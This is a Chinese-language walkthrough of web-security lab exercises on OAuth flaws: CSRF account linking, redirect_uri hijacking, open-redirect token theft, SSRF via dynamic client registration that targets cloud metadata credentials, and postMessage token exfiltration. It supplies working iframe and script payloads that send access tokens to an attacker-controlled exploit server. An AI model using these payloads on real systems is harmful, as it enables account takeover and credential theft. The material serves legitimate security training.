通过 OAuth 隐式流程绕过身份验证

强制 OAuth 配置文件链接

首先通过正常的登录方式登录

可以看到存在绑定社交媒体页面

这里的关键步骤在这里其中存在的漏洞点就是认证的链接单单靠着一步执行的而其中也没有别的参数去防止csrf 假如让一个登录的人访问我们的 /oauth-linking?code=k-iE3ti7b74nj3jUM_3-LUhYVrhBu592wzmSmT0d7Tp 那么通过他的session 就会绑定到我们的社交媒体账号

<iframe src="https://0a67007d040dc680c337abec006100e0.web-security-academy.net/oauth-linking?code=duxFgvd9fTrdOEAgTRSaESfEQcXxdYLhQotN6vwuiDr"></iframe>

注意丢弃这个请求

通过 redirect_uri 劫持 OAuth 帐户

可以看到这里存在 redirect_uri 重定向

<iframe src="https://oauth-0a9b005904abc4e7c2add27502bd00cc.web-security-academy.net/auth?client_id=udxb47mhd9thi45c5z1pa&redirect_uri=https://exploit-0a42002104f9c4c9c203d31b010900c3.exploit-server.net/oauth-callback&response_type=code&scope=openid%20profile%20email"></iframe>

同样需要丢弃

通过开放重定向窃取 OAuth 访问令牌

尝试更改重定向但是只能本域的请求

这里发现一个开放重定向

/auth?client_id=wcgy1zo0vkmt0bzxfyvh0&redirect_uri=https://0a36004703f50908c2814dc100f200bd.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0a7b00a9039a091fc2d14cf301a20094.exploit-server.net/exploit&response_type=token&nonce=1381684533&scope=openid%20profile%20email

<script>
    if (!document.location.hash) {
        window.location = 'https://oauth-0a480037034209e3c2374bb4026e0006.web-security-academy.net/auth?client_id=wcgy1zo0vkmt0bzxfyvh0&redirect_uri=https://0a36004703f50908c2814dc100f200bd.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0a7b00a9039a091fc2d14cf301a20094.exploit-server.net/exploit&response_type=token&nonce=1381684533&scope=openid%20profile%20email'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>

SSRF 通过 OpenID 动态客户端注册

/.well-known/openid-configuration

直接访问这个地址

POST /reg HTTP/1.1
Host: oauth-0a7f00d40340a246c0f67ad5020700cf.web-security-academy.net
Content-Type: application/json
Content-Length: 67

{
    "redirect_uris" : [
        "https://example.com"
    ]
}

其中返回了一个新的client_id

这里的logo页面推测可能使用的是clinet_id 尝试添加一个logouri

POST /reg HTTP/1.1
Host: oauth-0a7f00d40340a246c0f67ad5020700cf.web-security-academy.net
Content-Type: application/json
Content-Length: 67

{
    "redirect_uris" : [
        "https://example.com"
    ],
    "logo_uri" : "https://h5n0wfjfqk66i3yq7watum0ah1nsbnzc.oastify.com"
}

POST /reg HTTP/1.1
Host: oauth-0a7f00d40340a246c0f67ad5020700cf.web-security-academy.net
Content-Type: application/json
Content-Length: 141

{
    "redirect_uris" : [
        "https://example.com"
    ],
    "logo_uri" : "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
}

通过代理页面窃取 OAuth 访问令牌

这里存在一个iframe

<script>
    parent.postMessage({type: 'onload', data: window.location.href}, '*')
    function submitForm(form, ev) {
        ev.preventDefault();
        const formData = new FormData(document.getElementById("comment-form"));
        const hashParams = new URLSearchParams(window.location.hash.substr(1));
        const o = {};
        formData.forEach((v, k) => o[k] = v);
        hashParams.forEach((v, k) => o[k] = v);
        parent.postMessage({type: 'oncomment', content: o}, '*');
        form.reset();
    }
</script>

看下这段代码主要用处是向父级窗口发送当前的url

<iframe src="https://oauth-0a930046033223f9c1af5bb902e60026.web-security-academy.net/auth?client_id=cktbsx655uw8sgmyd13v8&redirect_uri=https://0a77009103fc23e4c1a05d9e005f008c.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1552239120&scope=openid%20profile%20email"></iframe>

<script>
    window.addEventListener('message', function(e) {
        fetch("/" + encodeURIComponent(e.data.data))
    }, false)
</script>

/https://0a77009103fc23e4c1a05d9e005f008c.web-security-academy.net/post/comment/comment-form#access_token=hH1IDsHhNbW_lKdgwRhxoG7DAyKhhF5stMyn25VLY5h&expires_in=3600&token_type=Bearer&scope=openid profile email